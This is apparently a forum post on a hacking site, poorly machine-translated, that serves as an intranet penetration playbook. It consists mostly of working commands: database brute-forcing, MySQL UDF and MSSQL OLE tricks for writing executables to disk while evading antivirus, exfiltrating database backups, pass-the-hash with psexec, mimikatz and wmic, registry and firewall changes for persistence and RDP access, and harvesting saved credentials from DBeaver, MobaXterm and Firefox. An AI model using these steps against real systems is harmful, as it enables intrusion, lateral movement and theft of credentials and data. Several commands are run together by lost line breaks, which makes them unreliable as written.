Jump to content

Title: Intranet penetration of flow accounts

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

 0x00 Environment

Linux host www permission host cannot go out of the external network forward proxy cannot use segment B intranet

0x01 Collect information

F-Scrack.py to obtain Redis, ES, etc.

The PS: Scrack.py's mssql module blasting is inaccurate, you can write a simple one by yourself

python Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6

1.Redis

Do not use keys when there are many keys *

View basic information : master, quantity, version number

Use scan to view keys: scan 0 match * count 100

View type : type key

Hash type : hgetall key

2.MySQL

In Windows, you can first test whether you can write to the plug-in directory :

select @@plugin_dir;

select hello into outfile plugin_dir; then use the udf that comes with msf, first convert it to hexadecimal, and then export it to plugin directory :

use test;

set @a=concat('',0xhex_of_exe);

create table Ghost(data LONGBLOB);

insert into Ghost values('');

update Ghost set data=@a;

select data from Ghost into DUMPFILE dir;

create function sys_eval returns string soname 'sys_eval.dll';

drop function sys_eval; //Delete after use, and develop good habits, first choose SYS_EVAL. Try not to use SYS_EXEC (it will crash)

3.mssql

mssql blasting should be placed in the back as much as possible, as the movement will be relatively large.

After the mssql blasting is successful, it is best to use CLR to obtain permissions. Using `xp_cmdshell` directly will die, and 360 will intercept it.

It is known that the user password, certutil and other tools of mssql will be intercepted or alarmed. You can use the tools provided by mssql to write to the hard disk:

Now open stored procedure :

sp_configure 'show advanced options', 1;

GO

RECONFIGURE;

GO

sp_configure 'Ole Automation Procedures', 1;

GO

RECONFIGURE;

mssql writes large files

For example, exe and other things are converted to hex first, and then written to file :

xxd -plain /tmp/test.exe | tr -d '\n' /tmp/dll.hex

declare @hexstring varchar(max);

set @hexstring='hex after conversion';

declare @file varbinary(max);

set @file=(select cast('' as xml).value('xs:hexBinary( substring(sql:variable('@hexstring'), sql:column('t.pos')) )', 'varbinary(max)')

from (select case substring(@hexstring, 1, 2) when '0x' then 3 else 0 end) as t(pos));

select @file;

declare @init int;

declare @filepath nvarchar(4000)=N'c:\22.exe';

EXEC sp_OACreate 'ADODB.Stream', @init OUTPUT; -- An instance created

EXEC sp_OASetProperty @init, 'Type', 1;

EXEC sp_OAMethod @init, 'Open'; -- Calling a method

EXEC sp_OAMethod @init, 'Write', NULL, @file; -- Calling a method

EXEC sp_OAMethod @init, 'SaveToFile', NULL, @filepath, 2; -- Calling a method

EXEC sp_OAMethod @init, 'Close'; -- Calling a method

EXEC sp_OADestroy @init; -- Closed the resources

4.mssql backup

BACKUP DATABASE db

TO DISK='C:\Windows\temp\db.bak' WITH COMPRESSION, INIT, STATS=5; Volume compression rar.exe a -m0 -v100m C:\windows\temp\db.split C:\windows\tasks\db.bak

download C:\\windows\temp\\db.split.rar /var/tmp/

6.pth

wmiwmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create 'cmd.exe /c ipconfigd:\result.txt' Recommended to use wmiexec.vbs:

https://github.com/l3m0n/pentest_study/blob/master/tools/wmiexec.vbs

cscript C:\Windows\Tasks\aliwmi.vbs /cmd ip 'C:\Windows\system32\calc.exe'msfuse exploit/windows/smb/psexec

show options

set RHOST 192.168.81.129

set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

set SMBUser Administrator

show options

runmimikatz || Cobalt Strikemimikatz.exe privilege:debug 'sekurlsa:pth /domain: /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF /run:cmd.exe' //pass hashpsexecpsexec /accepteula //accept the license agreement

sc delete psexesvc

psexec \\192.168.1.185 -u pt007 -p admin123 cmd.exe

psexec.vbscscript psexec.vbs 192.168.1.158 pt007 admin123 'ipconfig' remote command execution scnet use \\192.168.17.138\c$ 'admin123' /user:pt007

net use

dir \\192.168.17.138\c$

copy test.exe \\192.168.17.138\c$

sc \\192.168.17.138 create test binpath='c:\test.exe'

sc \\192.168.17.138 start test

sc \\192.168.17.138 del test

9 ways to remotely execute cmd in windows :https://xz.aliyun.com/t/5957

0x03 access is denied

For any computer that is not a RID 500, the token used is medium token, whether using wmi, psexec or other methods. When using wmiexec, it will be corrected that Access is Denied

When crawling a hash, the registry can be modified so that all local administrator group members can connect remotely as a means of persistence.

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f ###RDP's PTH

When the crawling hash cannot be cracked, if you use hash to log in to RDP remotely, the system you are logged in needs to enable "Restricted Admin Mode", which is enabled by default on Windows 8.1 and Windows Server 2012R2. Windows 7 and WinServer 2008 require installation of 2871997 and 2973351 pudding.

1. Start RDP

REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' /v PortNumber /t REG_DWORD /d0x00000d3d /f # Listen to port 3389

Turn on 3389

wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !='') call setallowtsconnections 1

2. Turn on Restricted Admin mode

REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

3. Add firewall rules

netsh advfirewall firewall add rule name='Remote Desktop' dir=in protocol=TCP localport=3389 action=allow

0x04 dump password

####dbeaver

dbeaver6 configuration file (the storage location and decryption method are different in different versions) :

#Password encrypted storage location :

C:\Users\user\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\credentials-config.json

#url and username :

C:\Users\user\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\data-sources.json decryption script:https://gist.github.com/felipou/50b60309f99b70b1e28f6d22da5d8e61

After downloading the credentials-config.json script, use python to decrypt :python decrypt.py credentials-config.json, and then search the corresponding IP and username in data-sources.json based on the decrypted id.

The old version of the password is stored in :C:\Users\users\.dbeaver4\General\.dbeaver-data-source.xml. You can use the online decryption directly using :http://dbeaver-password-decrypter.s3-website-us-west-2.amazonaws.com/

0x05 MobaXterm

There is a .ini file with corresponding IP information and private key address

Old version of storage : C:\Users%USERNAME%\AppData\Roaming\MobaXterm

2020 version : C:\Users%USERNAME%\Documents\MobaXterm

0x05 VSCODE

The configuration file under Windows is in this place :

%APPDATA%\Code\User\settings.json can find storage locations such as notes and ssh based on configuration files

0x06 Firefox

Master Sanhao said it very much, I chose to use firepwd.py:

Firefox configuration file directory :

%APPDATA%\Mozilla\Firefox\Profiles\

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.